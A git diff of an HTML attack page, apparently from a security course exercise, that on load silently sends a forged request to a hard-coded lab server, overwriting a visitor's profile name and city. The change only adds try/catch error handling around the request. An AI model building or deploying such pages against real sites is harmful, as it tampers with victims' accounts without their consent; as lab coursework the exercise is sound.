--- a/xss.html
+++ b/xss.html
@@ -2,13 +2,20 @@
 <html>
 <script>
 window.onload = function () {
-    alert("HEY 1");
-    var xmlHttp = null;
+    try
+    {
+        alert("HEY 1");
+        var xmlHttp = null;
 
-    xmlHttp = new XMLHttpRequest();
-    xmlHttp.open( "GET", "http://67.208.233.162/XSSAssignment/Profile.php?fnameBox=HackFirstName&lnameBox=HackLdsdsdsdastName&cityBox=HackVille&submit=Update", false );
-    xmlHttp.send( null );
-    alert("HEY 2");
+        xmlHttp = new XMLHttpRequest();
+        xmlHttp.open( "GET", "http://67.208.233.162/XSSAssignment/Profile.php?fnameBox=HackFirstName&lnameBox=HackLdsdsdsdastName&cityBox=HackVille&submit=Update", false );
+        xmlHttp.send( null );
+        alert("HEY 2");
+    }
+    catch(err)
+    {
+        alert(err);
+    }
 }
 </script>
 <body>
